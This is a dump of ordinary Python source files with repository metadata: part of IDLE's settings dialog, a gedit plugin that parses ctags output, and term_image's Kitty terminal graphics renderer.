self.keysAreBuiltin.set(0)
self.SetKeysType()
def LoadKeysList(self,keySetName):
reselect=0
newKeySet=0
if self.listBindings.curselection():
reselect=1
listIndex=self.listBindings.index(ANCHOR)
keySet=idleConf.GetKeySet(keySetName)
bindNames=keySet.keys()
bindNames.sort()
self.listBindings.delete(0,END)
for bindName in bindNames:
key=string.join(keySet[bindName]) #make key(s) into a string
bindName=bindName[2:-2] #trim off the angle brackets
if keySetName in self.changedItems['keys'].keys():
#handle any unsaved changes to this key set
if bindName in self.changedItems['keys'][keySetName].keys():
key=self.changedItems['keys'][keySetName][bindName]
self.listBindings.insert(END, bindName+' - '+key)
if reselect:
self.listBindings.see(listIndex)
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
def DeleteCustomKeys(self):
keySetName=self.customKeys.get()
if not tkMessageBox.askyesno('Delete Key Set','Are you sure you wish '+
'to delete the key set %r ?' % (keySetName),
parent=self):
return
#remove key set from config
idleConf.userCfg['keys'].remove_section(keySetName)
if keySetName in self.changedItems['keys']:
del(self.changedItems['keys'][keySetName])
#write changes
idleConf.userCfg['keys'].Save()
#reload user key set list
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
if not itemList:
self.radioKeysCustom.config(state=DISABLED)
self.optMenuKeysCustom.SetMenu(itemList,'- no custom keys -')
else:
self.optMenuKeysCustom.SetMenu(itemList,itemList[0])
#revert to default key set
self.keysAreBuiltin.set(idleConf.defaultCfg['main'].Get('Keys','default'))
self.builtinKeys.set(idleConf.defaultCfg['main'].Get('Keys','name'))
#user can't back out of these changes, they must be applied now
self.Apply()
self.SetKeysType()
def DeleteCustomTheme(self):
themeName=self.customTheme.get()
if not tkMessageBox.askyesno('Delete Theme','Are you sure you wish '+
'to delete the theme %r ?' % (themeName,),
parent=self):
return
#remove theme from config
idleConf.userCfg['highlight'].remove_section(themeName)
if themeName in self.changedItems['highlight']:
del(self.changedItems['highlight'][themeName])
#write changes
idleConf.userCfg['highlight'].Save()
#reload user theme list
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
if not itemList:
self.radioThemeCustom.config(state=DISABLED)
self.optMenuThemeCustom.SetMenu(itemList,'- no custom themes -')
else:
self.optMenuThemeCustom.SetMenu(itemList,itemList[0])
#revert to default theme
self.themeIsBuiltin.set(idleConf.defaultCfg['main'].Get('Theme','default'))
self.builtinTheme.set(idleConf.defaultCfg['main'].Get('Theme','name'))
#user can't back out of these changes, they must be applied now
self.Apply()
self.SetThemeType()
def GetColour(self):
target=self.highlightTarget.get()
prevColour=self.frameColourSet.cget('bg')
rgbTuplet, colourString = tkColorChooser.askcolor(parent=self,
title='Pick new colour for : '+target,initialcolor=prevColour)
if colourString and (colourString!=prevColour):
#user didn't cancel, and they chose a new colour
if self.themeIsBuiltin.get(): #current theme is a built-in
message=('Your changes will be saved as a new Custom Theme. '+
'Enter a name for your new Custom Theme below.')
newTheme=self.GetNewThemeName(message)
if not newTheme: #user cancelled custom theme creation
return
else: #create new custom theme based on previously active theme
self.CreateNewTheme(newTheme)
self.colour.set(colourString)
else: #current theme is user defined
self.colour.set(colourString)
def OnNewColourSet(self):
newColour=self.colour.get()
self.frameColourSet.config(bg=newColour)#set sample
if self.fgHilite.get(): plane='foreground'
else: plane='background'
sampleElement=self.themeElements[self.highlightTarget.get()][0]
self.textHighlightSample.tag_config(sampleElement, **{plane:newColour})
theme=self.customTheme.get()
themeElement=sampleElement+'-'+plane
self.AddChangedItem('highlight',theme,themeElement,newColour)
def GetNewThemeName(self,message):
usedNames=(idleConf.GetSectionList('user','highlight')+
idleConf.GetSectionList('default','highlight'))
newTheme=GetCfgSectionNameDialog(self,'New Custom Theme',
message,usedNames).result
return newTheme
def SaveAsNewTheme(self):
newThemeName=self.GetNewThemeName('New Theme Name:')
if newThemeName:
self.CreateNewTheme(newThemeName)
def CreateNewTheme(self,newThemeName):
#creates new custom theme based on the previously active theme,
#and makes the new theme active
if self.themeIsBuiltin.get():
themeType='default'
themeName=self.builtinTheme.get()
else:
themeType='user'
themeName=self.customTheme.get()
newTheme=idleConf.GetThemeDict(themeType,themeName)
#apply any of the old theme's unsaved changes to the new theme
if themeName in self.changedItems['highlight'].keys():
themeChanges=self.changedItems['highlight'][themeName]
for element in themeChanges.keys():
newTheme[element]=themeChanges[element]
#save the new theme
self.SaveNewTheme(newThemeName,newTheme)
#change gui over to the new theme
customThemeList=idleConf.GetSectionList('user','highlight')
customThemeList.sort()
self.optMenuThemeCustom.SetMenu(customThemeList,newThemeName)
self.themeIsBuiltin.set(0)
self.SetThemeType()
def OnListFontButtonRelease(self,event):
font = self.listFontName.get(ANCHOR)
self.fontName.set(font.lower())
self.SetFontSample()
def SetFontSample(self,event=None):
fontName=self.fontName.get()
if self.fontBold.get():
fontWeight=tkFont.BOLD
else:
fontWeight=tkFont.NORMAL
newFont = (fontName, self.fontSize.get(), fontWeight)
self.labelFontSample.config(font=newFont)
self.textHighlightSample.configure(font=newFont)
def SetHighlightTarget(self):
if self.highlightTarget.get()=='Cursor': #bg not possible
self.radioFg.config(state=DISABLED)
self.radioBg.config(state=DISABLED)
self.fgHilite.set(1)
else: #both fg and bg can be set
self.radioFg.config(state=NORMAL)
self.radioBg.config(state=NORMAL)
self.fgHilite.set(1)
self.SetColourSample()
def SetColourSampleBinding(self,*args):
self.SetColourSample()
def SetColourSample(self):
#set the colour smaple area
tag=self.themeElements[self.highlightTarget.get()][0]
if self.fgHilite.get(): plane='foreground'
else: plane='background'
colour=self.textHighlightSample.tag_cget(tag,plane)
self.frameColourSet.config(bg=colour)
def PaintThemeSample(self):
if self.themeIsBuiltin.get(): #a default theme
theme=self.builtinTheme.get()
else: #a user theme
theme=self.customTheme.get()
for elementTitle in self.themeElements.keys():
element=self.themeElements[elementTitle][0]
colours=idleConf.GetHighlight(theme,element)
if element=='cursor': #cursor sample needs special painting
colours['background']=idleConf.GetHighlight(theme,
'normal', fgBg='bg')
#handle any unsaved changes to this theme
if theme in self.changedItems['highlight'].keys():
themeDict=self.changedItems['highlight'][theme]
if element+'-foreground' in themeDict:
colours['foreground']=themeDict[element+'-foreground']
if element+'-background' in themeDict:
colours['background']=themeDict[element+'-background']
self.textHighlightSample.tag_config(element, **colours)
self.SetColourSample()
def HelpSourceSelected(self,event):
self.SetHelpListButtonStates()
def SetHelpListButtonStates(self):
if self.listHelp.size()<1: #no entries in list
self.buttonHelpListEdit.config(state=DISABLED)
self.buttonHelpListRemove.config(state=DISABLED)
else: #there are some entries
if self.listHelp.curselection(): #there currently is a selection
self.buttonHelpListEdit.config(state=NORMAL)
self.buttonHelpListRemove.config(state=NORMAL)
else: #there currently is not a selection
self.buttonHelpListEdit.config(state=DISABLED)
self.buttonHelpListRemove.config(state=DISABLED)
def HelpListItemAdd(self):
helpSource=GetHelpSourceDialog(self,'New Help Source').result
if helpSource:
self.userHelpList.append( (helpSource[0],helpSource[1]) )
self.listHelp.insert(END,helpSource[0])
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def HelpListItemEdit(self):
itemIndex=self.listHelp.index(ANCHOR)
helpSource=self.userHelpList[itemIndex]
newHelpSource=GetHelpSourceDialog(self,'Edit Help Source',
menuItem=helpSource[0],filePath=helpSource[1]).result
if (not newHelpSource) or (newHelpSource==helpSource):
return #no changes
self.userHelpList[itemIndex]=newHelpSource
self.listHelp.delete(itemIndex)
self.listHelp.insert(itemIndex,newHelpSource[0])
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def HelpListItemRemove(self):
itemIndex=self.listHelp.index(ANCHOR)
del(self.userHelpList[itemIndex])
self.listHelp.delete(itemIndex)
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def UpdateUserHelpChangedItems(self):
"Clear and rebuild the HelpFiles section in self.changedItems"
self.changedItems['main']['HelpFiles'] = {}
for num in range(1,len(self.userHelpList)+1):
self.AddChangedItem('main','HelpFiles',str(num),
string.join(self.userHelpList[num-1][:2],';'))
def LoadFontCfg(self):
##base editor font selection list
fonts=list(tkFont.families(self))
fonts.sort()
for font in fonts:
self.listFontName.insert(END,font)
configuredFont=idleConf.GetOption('main','EditorWindow','font',
default='courier')
lc_configuredFont = configuredFont.lower()
self.fontName.set(lc_configuredFont)
lc_fonts = [s.lower() for s in fonts]
if lc_configuredFont in lc_fonts:
currentFontIndex = lc_fonts.index(lc_configuredFont)
self.listFontName.see(currentFontIndex)
self.listFontName.select_set(currentFontIndex)
self.listFontName.select_anchor(currentFontIndex)
##font size dropdown
fontSize=idleConf.GetOption('main','EditorWindow','font-size',
type='int', default='10')
self.optMenuFontSize.SetMenu(('7','8','9','10','11','12','13','14',
'16','18','20','22'),fontSize )
##fontWeight
self.fontBold.set(idleConf.GetOption('main','EditorWindow',
'font-bold',default=0,type='bool'))
##font sample
self.SetFontSample()
def LoadTabCfg(self):
##indent sizes
spaceNum=idleConf.GetOption('main','Indent','num-spaces',
default=4,type='int')
self.spaceNum.set(spaceNum)
def LoadThemeCfg(self):
##current theme type radiobutton
self.themeIsBuiltin.set(idleConf.GetOption('main','Theme','default',
type='bool',default=1))
##currently set theme
currentOption=idleConf.CurrentTheme()
##load available theme option menus
if self.themeIsBuiltin.get(): #default theme selected
itemList=idleConf.GetSectionList('default','highlight')
itemList.sort()
self.optMenuThemeBuiltin.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
if not itemList:
self.radioThemeCustom.config(state=DISABLED)
self.customTheme.set('- no custom themes -')
else:
self.optMenuThemeCustom.SetMenu(itemList,itemList[0])
else: #user theme selected
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
self.optMenuThemeCustom.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('default','highlight')
itemList.sort()
self.optMenuThemeBuiltin.SetMenu(itemList,itemList[0])
self.SetThemeType()
##load theme element option menu
themeNames=self.themeElements.keys()
themeNames.sort(key=lambda x: self.themeElements[x][1])
self.optMenuHighlightTarget.SetMenu(themeNames,themeNames[0])
self.PaintThemeSample()
self.SetHighlightTarget()
def LoadKeyCfg(self):
##current keys type radiobutton
self.keysAreBuiltin.set(idleConf.GetOption('main','Keys','default',
type='bool',default=1))
##currently set keys
currentOption=idleConf.CurrentKeys()
##load available keyset option menus
if self.keysAreBuiltin.get(): #default theme selected
itemList=idleConf.GetSectionList('default','keys')
itemList.sort()
self.optMenuKeysBuiltin.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
if not itemList:
self.radioKeysCustom.config(state=DISABLED)
self.customKeys.set('- no custom keys -')
else:
self.optMenuKeysCustom.SetMenu(itemList,itemList[0])
else: #user key set selected
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
self.optMenuKeysCustom.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('default','keys')
itemList.sort()
self.optMenuKeysBuiltin.SetMenu(itemList,itemList[0])
self.SetKeysType()
##load keyset element list
keySetName=idleConf.CurrentKeys()
self.LoadKeysList(keySetName)
def LoadGeneralCfg(self):
#startup state
self.startupEdit.set(idleConf.GetOption('main','General',
'editor-on-startup',default=1,type='bool'))
#autosave state
self.autoSave.set(idleConf.GetOption('main', 'General', 'autosave',
default=0, type='bool'))
#initial window size
self.winWidth.set(idleConf.GetOption('main','EditorWindow','width',
type='int'))
self.winHeight.set(idleConf.GetOption('main','EditorWindow','height',
type='int'))
#initial paragraph reformat size
self.paraWidth.set(idleConf.GetOption('main','FormatParagraph','paragraph',
type='int'))
# default source encoding
self.encoding.set(idleConf.GetOption('main', 'EditorWindow',
'encoding', default='none'))
# additional help sources
self.userHelpList = idleConf.GetAllExtraHelpSourcesList()
for helpItem in self.userHelpList:
self.listHelp.insert(END,helpItem[0])
self.SetHelpListButtonStates()
def LoadConfigs(self):
"""
load configuration from default and user config files and populate
the widgets on the config dialog pages.
"""
### fonts / tabs page
self.LoadFontCfg()
self.LoadTabCfg()
### highlighting page
self.LoadThemeCfg()
### keys page
self.LoadKeyCfg()
### general page
self.LoadGeneralCfg()
def SaveNewKeySet(self,keySetName,keySet):
"""
save a newly created core key set.
keySetName - string, the name of the new key set
keySet - dictionary containing the new key set
"""
if not idleConf.userCfg['keys'].has_section(keySetName):
idleConf.userCfg['keys'].add_section(keySetName)
for event in keySet.keys():
value=keySet[event]
idleConf.userCfg['keys'].SetOption(keySetName,event,value)
def SaveNewTheme(self,themeName,theme):
"""
save a newly created theme.
themeName - string, the name of the new theme
theme - dictionary containing the new theme
"""
if not idleConf.userCfg['highlight'].has_section(themeName):
idleConf.userCfg['highlight'].add_section(themeName)
for element in theme.keys():
value=theme[element]
idleConf.userCfg['highlight'].SetOption(themeName,element,value)
def SetUserValue(self,configType,section,item,value):
if idleConf.defaultCfg[configType].has_option(section,item):
if idleConf.defaultCfg[configType].Get(section,item)==value:
#the setting equals a default setting, remove it from user cfg
return idleConf.userCfg[configType].RemoveOption(section,item)
#if we got here set the option
return idleConf.userCfg[configType].SetOption(section,item,value)
def SaveAllChangedConfigs(self):
"Save configuration changes to the user config file."
idleConf.userCfg['main'].Save()
for configType in self.changedItems.keys():
cfgTypeHasChanges = False
for section in self.changedItems[configType].keys():
if section == 'HelpFiles':
#this section gets completely replaced
idleConf.userCfg['main'].remove_section('HelpFiles')
cfgTypeHasChanges = True
for item in self.changedItems[configType][section].keys():
value = self.changedItems[configType][section][item]
if self.SetUserValue(configType,section,item,value):
cfgTypeHasChanges = True
if cfgTypeHasChanges:
idleConf.userCfg[configType].Save()
for configType in ['keys', 'highlight']:
# save these even if unchanged!
idleConf.userCfg[configType].Save()
self.ResetChangedItems() #clear the changed items dict
def DeactivateCurrentConfig(self):
#Before a config is saved, some cleanup of current
#config must be done - remove the previous keybindings
winInstances=self.parent.instance_dict.keys()
for instance in winInstances:
instance.RemoveKeybindings()
def ActivateConfigChanges(self):
"Dynamically apply configuration changes"
winInstances=self.parent.instance_dict.keys()
for instance in winInstances:
instance.ResetColorizer()
instance.ResetFont()
instance.set_notabs_indentwidth()
instance.ApplyKeybindings()
instance.reset_help_menu_entries()
def Cancel(self):
self.destroy()
def Ok(self):
self.Apply()
self.destroy()
def Apply(self):
self.DeactivateCurrentConfig()
self.SaveAllChangedConfigs()
self.ActivateConfigChanges()
def Help(self):
pass
if __name__ == '__main__':
#test the dialog
root=Tk()
Button(root,text='Dialog',
command=lambda:ConfigDialog(root,'Settings')).pack()
root.instance_dict={}
root.mainloop()
| 46.168103 | 99 | 0.644459 |
ace74a0472f645627d8d2ceaf5e7383234b0a44c | 9,171 | py | Python | codebrowser/parsers.py | nagaozen/gedit-plugin-codebrowser | a0a93732e0e38b86cddbdb86f10e8f6d46d892f5 | [
"Unlicense"
] | 2 | 2015-04-17T01:15:00.000Z | 2018-06-09T11:03:12.000Z | codebrowser/parsers.py | nagaozen/gedit-plugin-codebrowser | a0a93732e0e38b86cddbdb86f10e8f6d46d892f5 | [
"Unlicense"
] | null | null | null | codebrowser/parsers.py | nagaozen/gedit-plugin-codebrowser | a0a93732e0e38b86cddbdb86f10e8f6d46d892f5 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
# gEdit CodeBrowser plugin
# Copyright (C) 2011 Fabio Zendhi Nagao
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
import iconlib
import os
import re
import subprocess
import tempfile
def iif(condition, trueVal, falseVal):
if condition:
return trueVal
else:
return falseVal
class ParserInterface:
def parse(self, doc):
pass
def cellrenderer(self, tvc, crt, ts, piter):
pass
def pixbufrenderer(self, tvc, crp, ts, piter):
crp.set_property("pixbuf", "default")
class CTagsParser(ParserInterface):
def parse(self, doc):
code = doc.get_text(*doc.get_bounds())
lang = doc.get_language()
if not lang:
return None
lang = self.__get_lang(lang.get_id())
if not lang:
return None
tags = self.__generate_tags(code, lang)
ts = self.__tags_to_ts(tags)
return ts
def cellrenderer(self, tvc, crt, ts, piter):
text = ts.get_value(piter, 0)
crt.set_property("foreground-gdk", gtk.gdk.Color(0, 0, 0))
crt.set_property("text", text)
def pixbufrenderer(self, tvc, crp, ts, piter):
try:
icon = ts.get_value(piter, 3)
except:
icon = "default"
crp.set_property("pixbuf", iconlib.pixbufs[icon])
def __generate_tags(self, code, lang):
hdl_code, tmp_code = tempfile.mkstemp()
hdl_tags, tmp_tags = tempfile.mkstemp()
os.close(hdl_code)
os.close(hdl_tags)
f = open(tmp_code, 'w')
f.write(code)
f.close()
cmd = "ctags --fields=-fst+Kn --sort=no --language-force=%s -f %s %s" %(lang, tmp_tags, tmp_code)
subprocess.Popen(cmd, shell=True).wait()
os.remove(tmp_code)
return tmp_tags
#
# NOTE: CTags file format info at <http://ctags.sourceforge.net/ctags.html#TAG FILE FORMAT>
#
def __tags_to_ts(self, tags):
ts = gtk.TreeStore(str, str, int, str)
ts.set_sort_column_id(2, gtk.SORT_ASCENDING)
scopes = []
indent = "INDENT_UNIT_IS_UNKNOWN"
f = open(tags, 'r')
for line in f.readlines():
data = self.__get_line_data(line)
if data:
tagname = data[0]
tagfile = data[1]
tagaddress = data[2]
tagkind = data[3]
tagline = data[4]
if ( indent == "INDENT_UNIT_IS_UNKNOWN" ) and ( tagaddress.startswith(' ') or tagaddress.startswith('\t') ):
indent = self.__detect_indent_unit(tagaddress)
lvl = tagaddress.count(indent)
scopes = scopes[:lvl]
parent = None
if lvl > 0 and len(scopes) > 0:
parent = scopes[len(scopes) - 1]
scopes.append( ts.append(parent , [ tagname, tagfile, tagline, tagkind ]) )
f.close()
os.remove(tags)
return ts
def __get_line_data(self, line):
if line.startswith("!_"):
return None
tagaddress = re.findall(r'\/\^.*\$/;"', line)
if len(tagaddress) > 0:
tagaddress = tagaddress.pop()
else:
tagaddress = ""
line = re.sub(r'\/\^.*\$/;"', 'TAG_ADDRESS_REMOVED', line)
tokens = line.strip().split('\t')
tokens[2] = tagaddress[2:len(tokens[2])-4]# ignores regexp and vim compat hacks and get only the ... in /^...$/;"
tokens[3] = self.__get_type(tokens[0], tokens[2], tokens[3])
tokens[4] = int(tokens[4].strip().split(":").pop())
return tokens
def __detect_indent_unit(self, line):
indent = []
for c in line:
if c.isspace():
indent.append(c)
else:
break
return ''.join(indent)
def __get_type(self, tagname, tagaddress, tagkind):
maps = {
"array" : "enum",
"class" : "class",
"constant" : "const",
"component" : "struct",
"database" : "database",
"db_index" : "db_index",
"db_procedure" : "db_procedure",
"db_table" : "db_table",
"db_trigger" : "db_trigger",
"db_type" : "db_type",
"db_template" : "db_template",
"db_view" : "db_view",
"define" : "typedef",
"enum constant" : "enum",
"enum" : "enum",
"enumerator" : "enum",
"event" : "event",
"externvar" : "field",
"feature" : "method",
"field" : "field",
"format" : "method",
"function" : "method",
"interface" : "interface",
"jsfunction" : "method",
"label" : "proc",
"local" : "field",
"macro" : "macro",
"member" : "method",
"method" : "method",
"module" : "namespace",
"mxtag" : "default",
"namelist" : "enum",
"namespace" : "namespace",
"object" : "object",
"package" : "namespace",
"property" : "prop",
"prototype" : "method",
"record" : "struct",
"set" : "field",
"singleton method" : "method",
"struct" : "struct",
"subroutine" : "proc",
"table" : "table",
"type" : "struct",
"typedef" : "typedef",
"union" : "union",
"variable" : "field"
}
try:
tagkind = maps[tagkind]
if tagname.startswith("_") or ( tagaddress.lower().find("private") > -1 ):
tagkind = "%s_priv"%tagkind
elif tagaddress.lower().find("protected") > -1:
tagkind = "%s_prot"%tagkind
except:
print "<<CodeBrowser>> Warning: Failed to find %s map. Cascading to default." % tagkind
tagkind = "default"
return tagkind
def __get_lang(self, lang):
maps = {
"ant" : "ant",
"asm" : "asm",
"asp" : "asp",
"awk" : "awk",
"basic" : "basic",
"beta" : "beta",
"c" : "c",
"c-sharp" : "c#",
"cpp" : "c++",
"cobol" : "cobol",
"dosbatch" : "dosbatch",
"eiffel" : "eiffel",
"erlang" : "erlang",
"flex" : "flex",
"fortran" : "fortran",
"html" : "html",
"java" : "java",
"js" : "js",
"lisp" : "lisp",
"lua" : "lua",
"makefile" : "make",
"matlab" : "matlab",
"objective-caml" : "ocaml",
"pascal" : "pascal",
"perl" : "perl",
"php" : "php",
"python" : "python",
"rexx" : "rexx",
"ruby" : "ruby",
"scheme" : "scheme",
"sh" : "sh",
"slang" : "slang",
"sml" : "sml",
"sql" : "sql",
"tcl" : "tcl",
"texinfo" : "tex",
"vera" : "vera",
"verilog" : "verilog",
"vhdl" : "vhdl",
"vim" : "vim",
"yacc" : "yacc"
}
try:
ctags_lang = maps[lang]
except:
ctags_lang = None
return ctags_lang
# ex:ts=4:et:
| 32.989209 | 124 | 0.43136 |
ace74aa5296865526b970ea8883bad1719f44582 | 11,666 | py | Python | term_image/image/kitty.py | AnonymouX47/term-img | d7d1079d458d11be18a49be0e6055b2ec4815323 | [
"MIT"
] | 18 | 2021-10-31T19:02:43.000Z | 2022-02-21T09:52:52.000Z | term_image/image/kitty.py | AnonymouX47/term-img | d7d1079d458d11be18a49be0e6055b2ec4815323 | [
"MIT"
] | 3 | 2022-01-30T03:01:14.000Z | 2022-03-29T09:51:57.000Z | term_image/image/kitty.py | AnonymouX47/term-img | d7d1079d458d11be18a49be0e6055b2ec4815323 | [
"MIT"
] | 1 | 2022-01-30T14:07:59.000Z | 2022-01-30T14:07:59.000Z | from __future__ import annotations
__all__ = ("KittyImage",)
import io
import os
import sys
from base64 import standard_b64encode
from dataclasses import asdict, dataclass
from math import ceil
from operator import mul
from subprocess import run
from typing import Generator, Optional, Set, Tuple, Union
from zlib import compress, decompress
import PIL
from ..utils import get_cell_size, lock_tty, query_terminal
from .common import GraphicsImage
# Constants for ``KittyImage`` render method
LINES = "lines"
WHOLE = "whole"
class KittyImage(GraphicsImage):
"""A render style using the Kitty terminal graphics protocol.
See :py:class:`GraphicsImage` for the complete description of the constructor.
**Render Methods:**
:py:class:`KittyImage` provides two methods of :term:`rendering` images, namely:
lines
Renders an image line-by-line i.e the image if evenly split up across
the number of line it should occupy and all portions is joined together by
``\\n`` (newline sequence) to give the whole image.
Pros:
* Good for use cases where it might be required to trim some lines of the
image.
whole
Renders an image all at once i.e the entire image data is encoded into the first
line of the :term:`rendered` output, such that the entire image is drawn once
by the terminal and still occupies the proper amount of lines and columns.
Pros:
* Render results are less in number of characters compared to the
``lines`` method since the entire image is encoded at once.
* Better for non-animated images that are large in resolution and pixel
density as images are drawn once.
The render method can be set with
:py:meth:`set_render_method() <BaseImage.set_render_method>` using the names
specified above.
ATTENTION:
Currently supported terminal emulators include:
* `Kitty <https://sw.kovidgoyal.net/kitty/>`_ >= 0.20.0.
* `Konsole <https://konsole.kde.org>`_ >= 22.04.0.
"""
_render_methods: Set[str] = {LINES, WHOLE}
_default_render_method: str = LINES
_render_method: str = LINES
@classmethod
@lock_tty
def is_supported(cls):
if cls._supported is None:
# Kitty graphics query + terminal attribute query
# The second query is to speed up the query since most (if not all)
# terminals should support it and most terminals treat queries as FIFO
response = query_terminal(
(
f"{_START}a=q,t=d,i=31,f=24,s=1,v=1,C=1,c=1,r=1;AAAA{_END}\033[c"
).encode(),
lambda s: not s.endswith(b"c"),
)
# Not supported if it doesn't respond to either query
# or responds to the second but not the first
cls._supported = response and (
response.rpartition(b"\033")[0] == f"{_START}i=31;OK{_END}".encode()
)
# Currently, only kitty >= 0.20.0 and Konsole 22.04.0 implement the
# protocol features utilized
if cls._supported:
result = run(
"kitty +kitten query-terminal --wait-for=0.1 name version",
shell=True,
text=True,
capture_output=True,
)
name, version = map(
lambda query: query.partition(" ")[2], result.stdout.split("\n", 1)
)
cls._supported = (
not result.returncode
and name == "xterm-kitty"
and tuple(map(int, version.split("."))) >= (0, 20, 0)
or int(os.environ.get("KONSOLE_VERSION", "0")) >= 220400
)
return cls._supported
@classmethod
def _clear_images(cls):
_stdout_write(b"\033_Ga=d;\033\\")
return True
def _get_render_size(self) -> Tuple[int, int]:
return tuple(map(mul, self.rendered_size, get_cell_size() or (1, 2)))
@staticmethod
def _pixels_cols(
*, pixels: Optional[int] = None, cols: Optional[int] = None
) -> int:
return (
ceil(pixels // (get_cell_size() or (1, 2))[0])
if pixels is not None
else cols * (get_cell_size() or (1, 2))[0]
)
@staticmethod
def _pixels_lines(
*, pixels: Optional[int] = None, lines: Optional[int] = None
) -> int:
return (
ceil(pixels // (get_cell_size() or (1, 2))[1])
if pixels is not None
else lines * (get_cell_size() or (1, 2))[1]
)
def _render_image(
self, img: PIL.Image.Image, alpha: Union[None, float, str]
) -> str:
# Using `c` and `r` ensures that an image always occupies the correct amount
# of columns and lines even if the cell size has changed when it's drawn.
# Since we use `c` and `r` control data keys, there's no need upscaling the
# image on this end; ensures minimal payload.
render_size = self._get_render_size()
r_width, r_height = self.rendered_size
width, height = (
render_size
if mul(*render_size) < mul(*self._original_size)
else self._original_size
)
# When `_original_size` is used, ensure the height is a multiple of the rendered
# height, so that pixels can be evenly distributed among all lines.
# If r_height == 0, height == 0, extra == 0; Handled in `_get_render_data()`.
extra = height % (r_height or 1)
if extra:
# Incremented to the greater multiple to avoid losing any data
height = height - extra + r_height
img = self._get_render_data(img, alpha, size=(width, height))[0]
format = getattr(f, img.mode)
raw_image = img.tobytes()
# clean up
if img is not self._source:
img.close()
return getattr(self, f"_render_image_{self._render_method}")(
raw_image, format, width, height, r_width, r_height
)
@staticmethod
def _render_image_lines(
raw_image: bytes,
format: int,
width: int,
height: int,
r_width: int,
r_height: int,
) -> str:
# NOTE:
# It's more efficient to write separate strings to the buffer separately
# than concatenate and write together.
cell_height = height // r_height
bytes_per_line = width * cell_height * (format // 8)
with io.StringIO() as buffer, io.BytesIO(raw_image) as raw_image:
control_data = ControlData(f=format, s=width, v=cell_height, c=r_width, r=1)
trans = Transmission(control_data, raw_image.read(bytes_per_line))
fill = " " * r_width
buffer.write(trans.get_chunked())
# Writing spaces clears any text under transparent areas of an image
for _ in range(r_height - 1):
buffer.write(fill + "\n")
trans = Transmission(control_data, raw_image.read(bytes_per_line))
buffer.write(trans.get_chunked())
buffer.write(fill)
return buffer.getvalue()
@staticmethod
def _render_image_whole(
raw_image: bytes,
format: int,
width: int,
height: int,
r_width: int,
r_height: int,
) -> str:
return (
Transmission(
ControlData(f=format, s=width, v=height, c=r_width, r=r_height),
raw_image,
).get_chunked()
+ (" " * r_width + "\n") * (r_height - 1)
+ " " * r_width
)
@dataclass
class Transmission:
"""An abstraction of the kitty terminal graphics escape code.
Args:
control: The control data.
payload: The payload.
"""
control: ControlData
payload: bytes
def __post_init__(self):
self._compressed = False
if self.control.o == o.ZLIB:
self.compress()
def compress(self):
if self.control.t == t.DIRECT and not self._compressed:
self.payload = compress(self.payload)
self.control.o = o.ZLIB
self._compressed = True
def decompress(self):
if self.control.t == t.DIRECT and self._compressed:
self.control.o = None
self.payload = decompress(self.payload)
self._compressed = False
def encode(self) -> bytes:
return standard_b64encode(self.payload)
def get_chunked(self) -> str:
return "".join(self.get_chunks())
def get_chunks(self, size: int = 4096) -> Generator[str, None, None]:
payload = self.get_payload()
chunk, next_chunk = payload.read(size), payload.read(size)
yield f"\033_G{self.get_control_data()},m={bool(next_chunk):d};{chunk}\033\\"
chunk, next_chunk = next_chunk, payload.read(size)
while next_chunk:
yield f"\033_Gm=1;{chunk}\033\\"
chunk, next_chunk = next_chunk, payload.read(size)
if chunk: # false if there was never a next chunk
yield f"\033_Gm=0;{chunk}\033\\"
def get_control_data(self) -> str:
return ",".join(
f"{key}={value}"
for key, value in asdict(self.control).items()
if value is not None
)
def get_payload(self) -> io.StringIO:
return io.StringIO(self.encode().decode("ascii"))
# Values for control data keys with limited set of values
class a:
TRANS = "t"
TRANS_DISP = "T"
QUERY = "q"
PLACE = "p"
DELETE = "d"
TRANS_FRAMES = "f"
CONTROL_ANIM = "a"
COMPOSE_FRAMES = "c"
class C:
MOVE = 0
STAY = 1
class f:
RGB = 24
RGBA = 32
PNG = 100
class o:
ZLIB = "z"
class t:
DIRECT = "d"
FILE = "f"
TEMP = "t"
SHARED = "s"
class z:
BEHIND = -1
IN_FRONT = 0
@dataclass
class ControlData:
"""Represents a portion of the kitty terminal graphics protocol control data"""
a: Optional[str] = a.TRANS_DISP # action
f: Optional[int] = f.RGBA # data format
t: Optional[str] = t.DIRECT # transmission medium
s: Optional[int] = None # image width
v: Optional[int] = None # image height
z: Optional[int] = z.IN_FRONT # z-index
o: Optional[str] = o.ZLIB # compression
C: Optional[int] = C.STAY # cursor movement policy
# # Image display size in columns and rows/lines
# # The image is shrunk or enlarged to fit
c: Optional[int] = None # columns
r: Optional[int] = None # rows
def __post_init__(self):
if self.f == f.PNG:
self.s = self.v = None
class _ControlData: # Currently Unused
i: Optional[int] = None # image ID
d: Optional[str] = None # delete images
m: Optional[int] = None # payload chunk
O: Optional[int] = None # data start offset; with t=s or t=f
S: Optional[int] = None # data size in bytes; with f=100,o=z or t=s or t=f
# Origin offset (px) within the current cell; Must be less than the cell size
# (0, 0) == Top-left corner of the cell; Not used with `c` and `r`.
X: Optional[int] = None
Y: Optional[int] = None
# Image crop (px)
# # crop origin; (0, 0) == top-left corner of the image
x: Optional[int] = None
y: Optional[int] = None
# # crop rectangle size
w: Optional[int] = None
h: Optional[int] = None
_START = "\033_G"
_END = "\033\\"
_FMT = f"{_START}%(control)s;%(payload)s{_END}"
_stdout_write = sys.stdout.buffer.write
| 30.944297 | 88 | 0.590605 |
